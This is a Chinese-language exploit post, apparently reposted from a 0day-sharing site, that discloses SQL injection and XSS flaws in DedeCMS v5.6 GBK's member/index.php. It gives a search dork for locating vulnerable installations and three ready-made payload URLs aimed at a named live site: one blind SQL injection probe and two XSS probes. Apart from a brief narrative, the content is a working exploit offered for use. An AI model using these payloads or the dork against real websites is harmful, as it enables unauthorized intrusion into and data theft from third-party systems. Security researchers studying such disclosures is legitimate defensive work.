dedecms v5.6 GBK 注入漏洞

sbgl

来源：http://www.copydy.com
更多中国ODAY：http://www.copydy.com/zh-0day/
等待多日,DEDECMS终于快发布V5.6了.今天去dede官方,看到论坛上已经放出V5.6 的测试站点了
于是忍不住寂寞的我就去给做了一次黑箱测试.
运气不算太坏,顺利得到一个注入点..
暂时也没办法分析更多...
嗯,.
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
测试站点:http://www.haik8.com
=============================================================         
| # Title    : DEDECMS V5.6 GBK SQL injection Vulnerability                  
| # Author   : Akira                                                            
| # email    : MCAkira@HotMail.CoM                                                   
| # Home     : http://www.hackclub.net   
| # Web Site : http://zz.u5.cn
| #Download: http://www.dedecms.com                                                     
| # Dork     : Powered By DEDECMS.COM © 2004-2010 DEDECMS Inc.                              
| # Tested on: Microsoft Windows XP SP2  + Lunix (debian 5.0)      
| # Bug      :SQL injection ,XSS                                                               
======================Exploit By Akira =================================

方法：
http://www.haik8.com/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';

http://www.haik8.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'")/>

http://www.haik8.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'">